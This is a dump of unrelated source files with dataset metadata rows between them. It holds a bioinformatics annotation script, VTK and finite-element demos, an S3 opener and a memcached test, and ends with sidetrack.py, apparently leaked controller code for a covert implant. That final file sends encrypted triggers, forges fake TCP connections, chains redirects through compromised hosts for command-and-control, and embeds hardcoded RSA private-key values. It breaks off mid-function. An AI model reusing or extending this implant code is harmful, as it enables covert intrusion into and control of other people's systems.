metavar='<float or integer>',
help='''threshold Bit Score.''')
parser.add_argument('-c', '--coverage',
default=0.5,
type=float,
metavar='<float>',
help='''minimal coverage for input model (default is 0.5)''')
parser.add_argument('-i', '--insert',
action='store_const',
const=True,
default=False,
help='''don't add features inside CDS.''')
parser.add_argument('-a', '--alilen',
type=int,
default=False,
metavar='<integer>',
help='''set profile alignment length (the largest hmm_to if not specified).''')
parser.add_argument('-b', '--boundary',
type=int,
default=0,
metavar='<integer>',
help='''set allowed length boundary for hits being within features.''')
parser.add_argument('-d', '--duplicate',
action='store_const',
const=True,
default=False,
help='''no duplicate features with the same location \
and the same rpt_family qualifier
value.''')
parser.add_argument('-v', '--version',
action='version',
version='%(prog)s 1.3 (April 6, 2021)')
parser.add_argument('-f', '--feature',
metavar='<"feature key">',
default='unknown type',
help='''feature key to add (promoter, protein_bind \
etc.)''')
return parser
t_start = process_time()
args = createparser()
enter = args.parse_args()
arguments = sys.argv[1:0]
max_eval = enter.eval
if enter.length is not False:
enter.length = enter.length.split(':')
if len(enter.length) == 1:
enter.min_length = False
enter.max_length = int(enter.length[0])
else:
enter.min_length = int(enter.length[0])
enter.max_length = int(enter.length[1])
if not 0 <= enter.coverage <= 1:
sys.exit('Coverage value is invalid, please specify values in 0.0-1.0 range')
try:
from Bio import SeqIO
except ImportError:
sys.exit('\nYou have no Biopython module installed!\n\
You can download it here for free: \
http://biopython.org/wiki/Download\n')
try:
input_handle = open(enter.input_file, 'r')
except IOError:
sys.exit('Open error! Please check your genbank input file!')
circular_vs_linear = []
for line in input_handle.readlines():
if line.startswith('LOCUS'):
circular_vs_linear.append(line)
input_handle.close()
input_handle = open(enter.input_file, 'r')
if enter.input_file == enter.output_file:
sys.exit('Sorry, but we can\'t edit input file. Plese give another name \
to output file!')
try:
output_handle = open(enter.output_file, 'w')
except IOError:
sys.exit('Open error! Please check your genbank output path!')
print ('\nRepeatGen 1.0 (January 6, 2018)')
print ("="*50)
print ('Options used:\n')
for arg in range(1, len(sys.argv)):
print (sys.argv[arg])
file_path = enter.report_file
qualifier = {'CHECK': 'CHECKED!'}
qualifiers_function(enter.qual, qualifier)
prog = []
maxlen = 0
parser_result = nhmm_parser(file_path, maxlen)
allign_list = parser_result[0]
if enter.alilen is False:
model_length = parser_result[1] # if allignment length is not specified, maximal observed hmm_to is used
else:
model_length = enter.alilen
nhmm_prog(file_path, prog)
prog[2] = prog[2].replace('\r', '')
records = SeqIO.parse(input_handle, 'genbank')
allowed_types = ['CDS', 'ncRNA', 'sRNA', 'tRNA', 'misc_RNA']
total = 0
for record in records:
print ('\n' + "-"*50 + "\nCONTIG: " + record.id)
print ('\n FEATURES ADDED: \n')
allowed_features_list = []
for feature in record.features:
if feature.type in allowed_types:
allowed_features_list.append(feature)
try:
cds_loc_start = allowed_features_list[0]
except:
cds_loc_start = record.features[0]
try:
cds_loc_end = allowed_features_list[-1]
except:
cds_loc_end = record.features[-1]
for allign in allign_list:
from Bio import SeqFeature
if allign[2] == +1:
env_start = int(allign[0]) #env_from
env_end = int(allign[1]) #env_to
strnd = int(allign[2])
e_value = float(allign[3])
score = allign[4]
locus = allign[5]
version = allign[6]
hmm_from = allign[7]
hmm_to = allign[8]
hmm_diff = hmm_to - hmm_from
getcontext().prec = 4
hmm_coverage = Decimal((hmm_diff+1))/Decimal(model_length)
ali_start = allign[9]
ali_end = allign[10]
ali_diff = ali_end - ali_start
else:
env_start = int(allign[1]) #env_to
env_end = int(allign[0]) #env_from
strnd = int(allign[2])
e_value = float(allign[3])
score = allign[4]
locus = allign[5]
version = allign[6]
hmm_from = allign[7]
hmm_to = allign[8]
hmm_diff = hmm_to - hmm_from
getcontext().prec = 4
hmm_coverage = Decimal((hmm_diff+1))/Decimal(model_length)
ali_start = allign[10]
ali_end = allign[9]
ali_diff = ali_end - ali_start
start_pos = SeqFeature.ExactPosition(env_start-1)
end_pos = SeqFeature.ExactPosition(env_end)
feature_length = env_end - (env_start-1)
feature_location = FeatureLocation(start_pos, end_pos)
feature_type = enter.feature
from Bio.SeqFeature import SeqFeature
note_qualifier = dict()
note_qualifier['note'] = str('%s score %s E-value %s' %
(prog[2].replace('\n', ''),
score,
e_value))
my_feature = MySeqFeature(
location=feature_location,
type=feature_type,
strand=strnd,
qualifiers=dict(list(qualifier.items()) +
list(note_qualifier.items())))
if Decimal(hmm_coverage) >= Decimal(enter.coverage) and \
(
(enter.min_length != 0 and enter.min_length <= feature_length <= enter.max_length) or \
(enter.min_length == False and feature_length == enter.max_length) \
) and \
(score >= enter.score or enter.score is False):
for i in reversed(range(len(record.features))):
if record.features[i].location.start < \
my_feature.location.start and \
(enter.eval is False or e_value <= enter.eval or
enter.score is not False):
for c in range(len(allowed_features_list)-1):
if allowed_features_list[c].location.start <= \
my_feature.location.start <= \
allowed_features_list[c+1].location.start:
record.features.insert(i+1, my_feature)
break
break
if i == 0 and \
record.features[i].location.start > \
my_feature.location.start:
record.features.insert(i, my_feature)
break
if i == len(record.features)-1 and \
record.features[i].location.start < \
my_feature.location.start:
record.features.insert(i+1, my_feature)
break
repeats = []
for feature in record.features:
if 'rpt_family' in feature.qualifiers.keys():
if (feature.qualifiers['rpt_family'] == qualifier['rpt_family'] and \
enter.duplicate is True) or enter.duplicate is False:
repeats.append([feature, record.features.index(feature)])
if enter.insert:
hit_list = []
for i in range(len(record.features)):
if 'CHECK' in record.features[i].qualifiers.keys():
hit_list.append(record.features[i])
for i in reversed(range(len(hit_list))):
i = len(hit_list)-1-i
for n in range(len(allowed_features_list)-1):
if (
is_within_feature(allowed_features_list,
n,
hit_list[i]) and \
not is_within_boundary(allowed_features_list,
n,
hit_list[i])
) or \
wrong_promoter_strand(allowed_features_list[n],
hit_list[i],
allowed_features_list[n+1]):
hit_list.pop(i)
break
for i in reversed(range(len(record.features))):
if 'CHECK' in record.features[i].qualifiers.keys() and \
not any(record.features[i] == hit for hit in hit_list):
record.features.pop(i)
if enter.palindromic:
del_counter = 0
deleted = []
for feature in repeats:
if feature not in deleted:
for n in range(repeats.index(feature)+1, len(repeats)):
further = repeats[n][0]
if further.location.strand != feature[0].location.strand and \
0 <= (further.location.start-feature[0].location.start) <= 2 and \
0 <= (further.location.end-feature[0].location.end) <= 2 and \
'CHECK' in record.features[feature[1]-del_counter].qualifiers.keys():
del record.features[feature[1]-del_counter]
del_counter += 1
deleted.append(feature)
elif enter.duplicate is True:
if further.location.strand != feature[0].location.strand and \
0 <= (further.location.start-feature[0].location.start) <= 2 and \
0 <= (further.location.end-feature[0].location.end) <= 2 and \
'CHECK' not in record.features[feature[1]-del_counter].qualifiers.keys() and \
'CHECK' in record.features[repeats[n][1]-del_counter].qualifiers.keys():
del record.features[repeats[n][1]-del_counter]
del_counter += 1
deleted.append(further)
if enter.duplicate is True and \
'rpt_family' in qualifier.keys():
repeats = []
del_counter = 0
for feature in record.features:
if 'rpt_family' in feature.qualifiers.keys():
if feature.qualifiers['rpt_family'] == qualifier['rpt_family']:
repeats.append([feature, record.features.index(feature)])
for repeat in repeats:
for n in range(repeats.index(repeat)+1, len(repeats)):
further_repeat = repeats[n][0]
if 0 <= (further_repeat.location.start - repeat[0].location.start) <= 2 and \
0 <= (further_repeat.location.end - repeat[0].location.end) <= 2 and \
repeat[0].qualifiers['rpt_family'] == further_repeat.qualifiers['rpt_family']:
if score_parser(repeat[0]) >= \
score_parser(further_repeat):
del record.features[repeat[1]-del_counter]
elif score_parser(repeat[0]) < \
score_parser(further_repeat):
del record.features[repeats[n][0]-del_counter]
del_counter += 1
break
output_features = []
for feature in record.features:
if 'CHECK' in feature.qualifiers.keys():
del feature.qualifiers['CHECK']
output_features.append(feature)
score_list = sorting_output_features(output_features)
score_list.sort()
output(score_list, output_features)
print ('\nFeatures added:', len(output_features))
print ('\n' + "-"*50)
SeqIO.write(record, output_handle, 'genbank')
total += int(len(output_features))
output_handle.close()
newlines = dna_topology(enter.output_file, circular_vs_linear)
new_output_file = open(enter.output_file, 'w')
new_output_file.writelines(newlines)
new_output_file.close()
input_handle.close()
t_end = process_time()
print ('Total features: ', total)
print ('CPU time: {0:.3f} sec'.format(t_end-t_start))
print ('\n' + "="*50)
|
gpl-3.0
| -6,934,267,850,099,133,000
| 41.085409
| 109
| 0.50723
| false
| 4.087798
| false
| false
| false
|
lorensen/VTKExamples
|
src/Python/VisualizationAlgorithms/Cutter.py
|
1
|
1710
|
#!/usr/bin/env python
# A simple script to demonstrate the vtkCutter function
import vtk
def main():
colors = vtk.vtkNamedColors()
# Create a cube
cube = vtk.vtkCubeSource()
cube.SetXLength(40)
cube.SetYLength(30)
cube.SetZLength(20)
cubeMapper = vtk.vtkPolyDataMapper()
cubeMapper.SetInputConnection(cube.GetOutputPort())
# create a plane to cut,here it cuts in the XZ direction (xz normal=(1,0,0);XY =(0,0,1),YZ =(0,1,0)
plane = vtk.vtkPlane()
plane.SetOrigin(10, 0, 0)
plane.SetNormal(1, 0, 0)
# create cutter
cutter = vtk.vtkCutter()
cutter.SetCutFunction(plane)
cutter.SetInputConnection(cube.GetOutputPort())
cutter.Update()
cutterMapper = vtk.vtkPolyDataMapper()
cutterMapper.SetInputConnection(cutter.GetOutputPort())
# create plane actor
planeActor = vtk.vtkActor()
planeActor.GetProperty().SetColor(colors.GetColor3d("Yellow"))
planeActor.GetProperty().SetLineWidth(2)
planeActor.SetMapper(cutterMapper)
# create cube actor
cubeActor = vtk.vtkActor()
cubeActor.GetProperty().SetColor(colors.GetColor3d("Aquamarine"))
cubeActor.GetProperty().SetOpacity(0.3)
cubeActor.SetMapper(cubeMapper)
# create renderers and add actors of plane and cube
ren = vtk.vtkRenderer()
ren.AddActor(planeActor)
ren.AddActor(cubeActor)
# Add renderer to renderwindow and render
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(600, 600)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
ren.SetBackground(colors.GetColor3d("Silver"))
renWin.Render()
iren.Start()
if __name__ == '__main__':
main()
|
apache-2.0
| 636,900,238,253,238,100
| 26.580645
| 103
| 0.693567
| false
| 3.392857
| false
| false
| false
|
ngsxfem/ngsxfem
|
demos/fictdom_mlset.py
|
1
|
4537
|
"""
In this example we solve an unfitted Poisson problem similar to the one in
`fictdom.py`, however this time with the unfitted geometry being the
unit square. This example shall illustrate the functionality of ngsxfem to
solve PDE problems on geometries described via multiple level set functions.
PDE problem + Discretisation + Geometry + Implementation aspects:
-----------------------------------------------------------------
* As in fictdom.py except for the different geometry and its handling.
Used Features:
--------------
* Quadrature with respect to multiple level set functions., see the
'mlset_pde' jupyter tutorial.
* MultiLevelsetCutInfo, see the 'mlset_basic' jupyter tutorial.
* DomainTypeArray convenience layer, see the 'mlset_basic' jupyter
tutorial.
* Restricted BilinearForm, jupyter tutorial `basics`.
* Cut Differential Symbols, jupyter tutorials `intlset` and `cutfem`.
"""
# ------------------------------ LOAD LIBRARIES -------------------------------
from netgen.geom2d import SplineGeometry
from ngsolve import *
from xfem import *
from xfem.mlset import *
ngsglobals.msg_level = 2
# -------------------------------- PARAMETERS ---------------------------------
# Domain corners
ll, ur = (-0.2, -0.2), (1.2, 1.2)
# Initial mesh diameter
initial_maxh = 0.4
# Number of mesh bisections
nref = 3
# Order of finite element space
k = 1
# Stabilization parameter for ghost-penalty
gamma_s = 0.5
# Stabilization parameter for Nitsche
gamma_n = 10
# ----------------------------------- MAIN ------------------------------------
# Set up the level sets, exact solution and right-hand side
def level_sets():
return [-y, x - 1, y - 1, -x]
nr_ls = len(level_sets())
u_ex = 16 * x * (1 - x) * y * (1 - y)
grad_u_ex = (u_ex.Diff(x).Compile(), u_ex.Diff(y).Compile())
rhs = -(u_ex.Diff(x).Diff(x) + u_ex.Diff(y).Diff(y)).Compile()
# Geometry and mesh
geo = SplineGeometry()
geo.AddRectangle(ll, ur, bcs=("bottom", "right", "top", "left"))
ngmesh = geo.GenerateMesh(maxh=initial_maxh)
for i in range(nref):
ngmesh.Refine()
mesh = Mesh(ngmesh)
# Level set and cut-information
P1 = H1(mesh, order=1)
lsetsp1 = tuple(GridFunction(P1) for i in range(nr_ls))
for i, lsetp1 in enumerate(lsetsp1):
InterpolateToP1(level_sets()[i], lsetp1)
Draw(lsetp1, mesh, "lsetp1_{}".format(i))
square = DomainTypeArray((NEG, NEG, NEG, NEG))
with TaskManager():
square.Compress(lsetsp1)
boundary = square.Boundary()
boundary.Compress(lsetsp1)
mlci = MultiLevelsetCutInfo(mesh, lsetsp1)
# Element and degrees-of-freedom markers
els_if_singe = {dtt: BitArray(mesh.ne) for dtt in boundary}
facets_gp = BitArray(mesh.nedge)
hasneg = mlci.GetElementsWithContribution(square)
# Finite element space
Vhbase = H1(mesh, order=k, dgjumps=True)
Vh = Restrict(Vhbase, hasneg)
gfu = GridFunction(Vh)
hasif = mlci.GetElementsWithContribution(boundary)
Draw(BitArrayCF(hasif), mesh, "hasif")
for i, (dtt, els_bnd) in enumerate(els_if_singe.items()):
els_bnd[:] = mlci.GetElementsWithContribution(dtt)
Draw(BitArrayCF(els_bnd), mesh, "els_if_singe" + str(i))
facets_gp = GetFacetsWithNeighborTypes(mesh, a=hasneg, b=hasif,
use_and=True)
els_gp = GetElementsWithNeighborFacets(mesh, facets_gp)
Draw(BitArrayCF(els_gp), mesh, "gp_elements")
# Bilinear and linear forms of the weak formulation
u, v = Vh.TnT()
h = specialcf.mesh_size
normals = square.GetOuterNormals(lsetsp1)
# Set up the integrator symbols
dx = dCut(lsetsp1, square, definedonelements=hasneg)
ds = {dtt: dCut(lsetsp1, dtt, definedonelements=els_if_singe[dtt])
for dtt in boundary}
dw = dFacetPatch(definedonelements=facets_gp)
# Construct integrator
a = RestrictedBilinearForm(Vh, facet_restriction=facets_gp, check_unused=False)
a += InnerProduct(grad(u), grad(v)) * dx
for bnd, n in normals.items():
a += -InnerProduct(grad(u) * n, v) * ds[bnd]
a += -InnerProduct(grad(v) * n, u) * ds[bnd]
a += (gamma_n * k * k / h) * InnerProduct(u, v) * ds[bnd]
a += gamma_s / (h**2) * (u - u.Other()) * (v - v.Other()) * dw
f = LinearForm(Vh)
f += rhs * v * dx
# Assemble and solve the linear system
f.Assemble()
a.Assemble()
gfu.vec.data = a.mat.Inverse(Vh.FreeDofs()) * f.vec
Draw(gfu, mesh, "uh")
# Post-processing
err_l2 = sqrt(Integrate((gfu - u_ex)**2 * dx.order(2 * k), mesh))
err_h1 = sqrt(Integrate((Grad(gfu) - grad_u_ex)**2 * dx.order(2 * (k - 1)),
mesh))
print("L2 error = {:1.5e}".format(err_l2), "H1 error = {:1.5e}".format(err_h1))
|
lgpl-3.0
| 2,544,864,473,202,585,000
| 29.655405
| 79
| 0.648446
| false
| 2.857053
| false
| false
| false
|
selassid/canopener
|
canopener/s3file.py
|
1
|
1324
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
import tempfile
from boto.s3.connection import S3Connection
def make_s3_connection(aws_access_key_id=None, aws_secret_access_key=None):
"""Mockable point for creating S3Connections."""
return S3Connection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
)
class s3file(object):
def __new__(
cls,
filename,
mode='r',
aws_access_key_id=None,
aws_secret_access_key=None,
):
"""Opens a local copy of an S3 URL."""
parse = urlparse(filename)
if 'w' in mode:
raise ValueError("can't write to S3")
if parse.scheme != 's3':
raise ValueError("s3file can't open non-S3 URLs")
conn = make_s3_connection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
)
bucket = conn.get_bucket(parse.netloc)
key = bucket.get_key(parse.path)
local_file = tempfile.TemporaryFile()
key.get_contents_to_file(local_file)
local_file.seek(0)
return local_file
|
bsd-2-clause
| -4,765,795,732,312,073,000
| 26.583333
| 75
| 0.616314
| false
| 3.568733
| false
| false
| false
|
hankshz/dockers
|
memcached/script/test-memcached.py
|
1
|
1304
|
#!/usr/bin/env python3
import time
from pymemcache.client.base import Client
master = Client(('memcached-master', 11211))
slave1 = Client(('memcached-slave1', 11211))
slave2 = Client(('memcached-slave2', 11211))
slave3 = Client(('memcached-slave3', 11211))
# Invalidate all
# mcrouter seems not work properly with pymemcache flush_all
slave1.flush_all()
slave2.flush_all()
slave3.flush_all()
# Set & Get from the master
master.set('a', '1')
assert(master.get('a') == b'1')
master.set('b', '2')
assert(master.get('b') == b'2')
master.set('c', '3')
assert(master.get('c') == b'3')
master.set('d', '4')
assert(master.get('d') == b'4')
# Get from the slave1, only string starts with 'a'
slave1 = Client(('memcached-slave1', 11211))
assert(slave1.get('a') == b'1')
assert(slave1.get('b') == None)
assert(slave1.get('c') == None)
assert(slave1.get('d') == None)
# Get from the slave2, only string starts with 'b'
slave2 = Client(('memcached-slave2', 11211))
assert(slave2.get('a') == None)
assert(slave2.get('b') == b'2')
assert(slave2.get('c') == None)
assert(slave2.get('d') == None)
# Get from the slave3, only rest of strings
slave3 = Client(('memcached-slave3', 11211))
assert(slave3.get('a') == None)
assert(slave3.get('b') == None)
assert(slave3.get('c') == b'3')
assert(slave3.get('d') == b'4')
|
apache-2.0
| -5,473,104,553,618,401,000
| 27.347826
| 60
| 0.663344
| false
| 2.728033
| false
| true
| false
|
DarthMaulware/EquationGroupLeaks
|
Leak #4 - Don't Forget Your Base/EQGRP-Auction-File/Linux/bin/pyside/sidetrack.py
|
1
|
72163
|
import base
import crypto
import echocmd
import string
import struct
import time
import re
import os
import sys
from socket import *
import rawtcp
import types
class SIDECMD(echocmd.ECHOCMD):
def __init__(self):
echocmd.ECHOCMD.__init__(self)
def TypeConvert(self, stype):
#print "In TypeConvert %d" % (stype)
if type(stype) != type(''):
if stype == 1:
stype = "A"
elif stype == 2:
stype = "NS"
elif stype == 3:
stype = "MD"
elif stype == 4:
stype = "MF"
elif stype == 5:
stype = "CNAME"
elif stype == 6:
stype = "SOA"
elif stype == 7:
stype = "MB"
elif stype == 8:
stype = "MG"
elif stype == 9:
stype = "MR"
elif stype == 10:
stype = "NULL"
elif stype == 11:
stype = "WKS"
elif stype == 12:
stype = "PTR"
elif stype == 13:
stype = "HINFO"
elif stype == 14:
stype = "MINFO"
elif stype == 15:
stype = "MX"
elif stype == 16:
stype = "TXT"
elif stype == 252:
stype = "AXFR"
elif stype == 253:
stype = "MAILB"
elif stype == 254:
stype = "MAILA"
elif stype == 255:
stype = "*"
return stype
def ConvertType(self, rtype):
if type(rtype) != type(0):
rtype = string.upper(rtype)
if rtype == "A":
rtype = 1
elif rtype == "NS":
rtype = 2
elif rtype == "MD":
rtype = 3
elif rtype == "MF":
rtype = 4
elif rtype == "CNAME":
rtype = 5
elif rtype == "SOA":
rtype = 6
elif rtype == "MB":
rtype = 7
elif rtype == "MG":
rtype = 8
elif rtype == "MR":
rtype = 9
elif rtype == "NULL":
rtype = 10
elif rtype == "WKS":
rtype = 11
elif rtype == "PTR":
rtype = 12
elif rtype == "HINFO":
rtype = 13
elif rtype == "MINFO":
rtype = 14
elif rtype == "MX":
rtype = 15
elif rtype == "TXT":
rtype = 16
elif rtype == "AXFR":
rtype = 252
elif rtype == "MAILB":
rtype = 253
elif rtype == "MAILA":
rtype = 254
elif rtype == "*":
rtype = 255
return rtype
def ClassConvert(self, rclass):
#print "In ClassConvert %d" % (rclass)
if type(rclass) != type(''):
if rclass == 1:
rclass = "IN"
elif rclass == 2:
rclass = "CS"
elif rclass == 3:
rclass = "CH"
elif rclass == 4:
rclass = "HS"
return rclass
def ConvertClass(self, rclass):
if type(rclass) != type(0):
rclass = string.upper(rclass)
if rclass == "IN":
rclass = 1
elif rclass == "CS":
rclass = 2
elif rclass == "CH":
rclass = 3
elif rclass == "HS":
rclass = 4
return rclass
def ConvertFlags(self, flags):
# qr rd ra
retFlags = 0
if type(flags) != type(0):
flags = string.upper(flags)
if flags == "RA":
retFlags = retFlags | 0x0080L
if flags == "AA":
retFlags = retFlags | 0x0400L
return retFlags
def SectionConvert(self,section):
if type(section) != type(''):
if section == 0:
section = "query"
elif section == 1:
section = "ans"
elif section == 2:
section = "auth"
elif section == 3:
section = "add"
return section
def ConvertSection(self,section):
if type(section) != type(0):
section = string.upper(section)
if section[:1] == "Q":
section = 0
elif section[:2] == "AN":
section = 1
elif section[:2] == "AU":
section = 2
elif section[:2] == "AD":
section = 3
return section
def NameConvertName(self, name):
ret = ''
sp = 0
if type(name) != type(0):
while name[sp:sp+1] != '\000':
namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0]
#print namelen
if sp != 0:
ret = ret + '.'
for i in range(1,namelen+1):
val = struct.unpack("!H", '\000' + name[sp+i:sp+i+1])[0]
if val >= 32 and val < 127:
ret = ret + name[sp+i:sp+i+1]
else:
raise TypeError, self.HexConvert(name)
sp = sp+1+namelen
return ret
def NameConvert(self, name, padding=0):
try:
return self.NameConvertName(name)
except:
return self.HexConvert(name, padding)
def ConvertName(self, name):
ret = ''
regExpr = re.compile("^[a-zA-Z0-9-_.]*$")
if type(name) != type(0x0L):
reg = regExpr.search(name)
if reg != None:
dots = string.splitfields(name,".")
for i in range(len(dots)):
ret = ret + chr(len(dots[i])) + dots[i]
ret = ret + '\000'
return ret
else:
return name
else:
return struct.pack("!H",name)
def FlagConvert(self, flag):
if flag == 0:
return "Ignore"
elif flag == 1:
return "Count"
elif flag == 2:
return "Active"
def HexConvert(self,data,pad=0):
ret = ''
padding = ''
for i in range(pad):
padding = padding + ' '
for i in range(len(data)):
if i % 16 == 0 and i != 0:
ret = ret + '\n' + padding
myNum = struct.unpack("!H", '\000'+data[i:i+1])[0]
ret = ret + "%02x " % myNum
ret = ret + '\n' + padding + "(%d)" % (len(data))
return ret
class SIDETRACK(base.Implant):
def __init__(self, session, proto):
base.Implant.__init__(self, session, proto)
self.name = 'SIDETRACK'
self.newCV = None
self.targetopts = self.session.target.GetImplantOpts('sidetrack')
self.version = self.targetopts['VERSION']
if self.version >= 2.0:
self.cipher = crypto.rc6()
else:
self.cipher = crypto.rc5()
self.cipher.SetKey(self.targetopts['KEY'])
self.N = 0xdec9ba81a6b9ea70c876ad3413aa7dd57be75d42e668843b1401fd42015144231004bfab4e459dabdbb159665b48a4d72357c3630d0e911b5b96bf0b0d8ab83f4bb045a13ea2acc85d120c3539f206200b9931a41ad6141eb7212e66784880ff6f32b16e1783d4ca52fe5ec484ef94f019feaf58abbc5de6a62f10eec347ac4dL
self.d = 0x25219f159bc9a712cc13c788adf1bfa394a68f8b2666c0b48355aa35aae2e0b082ab754737b644f1f9f2e43bb9e170ce85e3f5e5d7826d848f43ca81d7971eb4e7a62bc8e5e0a549bcb9ecb216451f8ba32444a71cb0ff97a77500cb39f802968ae7c10366d3eed895b939ec54eb8c4c54329bddb0eb00e691bc6b5d10d5af05L
self.Nsign = 0xb2003aac88a36d45d840bc748aa972b3f2e69a29f43f1e2faf810d9172db756d4843492489781764688d29c3a547a1522702d20e10f426149ac2f323bf35dfa1cb036f467109fd321bae03711eab16b210ed131ac077113f1dd34be480508708893c1a40fdc1b1d637e1cf3efd13e6bbbdc88a8c2fc103a45c490ba933a79a31L
self.dsign = 0x076aad1c85b179e2e902b284db1c64c77f74466c6a2d4beca7500b3b64c924e48dad786185ba564ed9b08c6826e2fc0e16f5736b40b4d6eb8672ca217d4ce95156a1920e3e48fe1dfe82738bb6ec985c441421d188962b141d3113773e8006b1273de6b846635ff7979547b516d7c426d5c3b0e2505150095b81e266e3b97c03L
self.packetSize = 450
self.timediff = self.session.target.timediff
self.localRedir = None
self.parent = None
self.children = []
self.rules = []
def RegisterCommands(self):
self.AddCommand('ping', echocmd.ECHOCMD_PING)
self.AddCommand('status', echocmd.ECHOCMD_STATUS)
self.AddCommand('done', echocmd.ECHOCMD_DONE)
self.AddCommand('setsize', echocmd.ECHOCMD_SETSIZE)
self.AddCommand('timediff', echocmd.ECHOCMD_TIMEDIFF)
self.AddCommand('incision', echocmd.ECHOCMD_INCISION)
self.AddCommand('rekey', echocmd.ECHOCMD_REKEY)
self.AddCommand('switchkey', echocmd.ECHOCMD_SWITCHKEY)
self.AddCommand('origkey', echocmd.ECHOCMD_ORIGKEY)
self.AddCommand('key', echocmd.ECHOCMD_KEY)
self.AddCommand('init', SIDECMD_INIT)
self.AddCommand('dnsadd', SIDECMD_DNSADD)
self.AddCommand('dnsrm', SIDECMD_DNSREMOVE)
self.AddCommand('dnsset', SIDECMD_DNSSET)
self.AddCommand('dnsaction', SIDECMD_DNSACTION)
self.AddCommand('dnsraw', SIDECMD_DNSRAW)
self.AddCommand('dnslist', SIDECMD_DNSLIST)
self.AddCommand('dnsload', SIDECMD_DNSLOAD)
self.AddCommand('dnssave', SIDECMD_DNSSAVE)
self.AddCommand('rediradd', SIDECMD_REDIRADD)
self.AddCommand('redirlist', SIDECMD_REDIRLIST)
self.AddCommand('redirset', SIDECMD_REDIRSET)
self.AddCommand('redirrm', SIDECMD_REDIRREMOVE)
self.AddCommand('connlist', SIDECMD_CONNLIST)
self.AddCommand('connrm', SIDECMD_CONNREMOVE)
self.AddCommand('stunload', SIDECMD_UNLOAD)
self.AddCommand('connect', SIDECMD_CONNECT)
self.AddCommand('cclist', SIDECMD_CCLIST)
self.AddCommand('ccremove', SIDECMD_CCREMOVE)
self.AddCommand('multiaddr', SIDECMD_MULTIADDR)
##########################################################################
# HASANOTHERADDRESS class
#########################################################################
class SIDECMD_MULTIADDR(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "multiaddr"
self.usage = "multiaddr <0|1>"
self.info = "Let pyside know that the target has multiple addresses"
def run(self, value=1):
self.implant.session.target.hasAnotherAddress = value
return (1, "Value updated")
##########################################################################
# CONNECT class
#########################################################################
class SIDECMD_CONNECT(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "connect"
self.usage = "connect <listen_address>:<listen_port>/<callback_port> <trigger_port>"
self.info = "Connect to SIDETRACK"
def parseHostInfo(self,host):
#split the ip from the ports
res = string.split(host,":")
if len(res) == 1:
raise ValueError, host
elif len(res) == 2:
ports = string.split(res[1],"/")
if len(ports) != 2:
raise ValueError, host
if ports[0] == "*":
raise ValueError, ports[0]
else:
ports[0] = eval(ports[0])
if ports[1] == "*":
raise ValueError, ports[1]
else:
ports[1] = eval(ports[1])
try:
host = None
ipaddr = self.ConvertIP(res[0])
except:
# host references a session
host = base.sessionDict[res[0]]
ipaddr = self.ConvertIP(host.target.GetIP())
return host,ipaddr,ports[0],ports[1]
else:
raise ValueError, host
def run(self,hostinfo,fport):
# Parse the ports
prevRule = None
tempRule = None
localRedir = None
host,laddr,lport,cbport = self.parseHostInfo(hostinfo)
if fport == 0:
PORT = 500
#open the listener
try:
sock = socket(AF_INET,SOCK_STREAM,0)
sock.bind(('',lport))
sock.listen(2)
except error, message:
return (0, "Could not open port %d %s" % (lport,message))
# See if the user entered another host
if host != None:
self.implant.parent = host
#hpn is the hop prior to host (might just be "me")
hpn = host.implant.parent.name
myname = host.name
hostinfo = re.sub(myname,hpn,hostinfo)
# Testing
localRedir = REDIRECT(self,0,10800,10800,6,\
self.ConvertIP(self.implant.session.target.ip), \
self.ConvertIP(self.implant.session.target.ip),
0,0,0,(0,0,0,0),0,0x201,lport,cbport,0,0)
localRedir.add(0)
self.implant.session.localRedir = localRedir
# Add a redirect (on the previous host) for this connection
cmd = host.GetCommand('rediradd')
base.ccSupport = 1
res = cmd.run("tcp",hostinfo,"%s:%d/%d"%(self.implant.session.target.ip,cbport,lport),"-tfix", "-afix","-l","3h","-c","3h")
base.ccSupport = 0
if res[0] == 0:
return res
# Let the previous implant know this redirect rule is in support
# of a command and control connection
prevRule = cmd.redir
if prevRule != None:
prevRule.ccPassthru = self.implant.session
# Add a temporary rule to allow the trigger to be passed to target
base.ccSupport = 1
if fport == 0:
res = cmd.run("udp","%s:%d/%d"%(hpn,PORT,PORT),"%s:%d/%d"%(self.implant.session.target.ip,PORT,PORT),"-tfix", "-afix")
else:
res = cmd.run("tcp","%s:%d/%d"%(hpn,0,fport),"%s:%d/%d"%(self.implant.session.target.ip,fport,0),"-tfix")
base.ccSupport = 0
base.db(2,"%d.%d.%d.%d"%(res[2] >> 24, (res[2] >> 16) & 0xff, (res[2] >> 8) & 0xff, res[2] & 0xff))
if res[0] == 0:
if prevRule != None:
prevRule.remove()
return (0, "Unable to establish redir for port %d: %s"%(fport,res[1]))
tempRule = cmd.redir
else:
localRedir = None
prevRule = None
self.implant.session.localRedir = None
#add the rule
if tempRule == None or (tempRule != None and \
cmd.implant.session.target.hasAnotherAddress == 0):
rule = base.redir.listen(laddr,\
self.ConvertIP(self.implant.session.target.ip),\
fport,lport,cbport,\
self.implant.timediff, \
self.implant.cipher.GetKey())
else:
rule = base.redir.listen(tempRule.ST_ip,\
self.ConvertIP(self.implant.session.target.ip),\
fport,lport,cbport,\
self.implant.timediff, \
self.implant.cipher.GetKey())
#Make the connection
if fport == 0:
conn = socket(AF_INET,SOCK_DGRAM,0)
conn.bind(('',PORT))
conn.connect((self.implant.session.target.ip,PORT))
f = os.popen("dd if=/dev/urandom bs=128 count=3 2>/dev/null")
d = f.read()
f = None
data = d[0:14] + struct.pack("HBBBB", 0, 0x08, 0x10, 0x20, 0x01) + \
d[16:20] + struct.pack("!L", 0x154) + d[20:332]
conn.send(data)
conn.close()
#accept
self.implant.protocol.sock,addr = sock.accept()
else:
#conn = socket(AF_INET,SOCK_STREAM,0)
# STUB: Catch this in a try statement
try:
# esev - 6/24/03
#conn.connect((self.implant.session.target.ip,fport))
#conn.close()
#conn = None
rawtcp.sendFakeConnection(self.implant.session.target.ip,fport)
# STUB: Put a timeout here
#accept
self.implant.protocol.sock,addr = sock.accept()
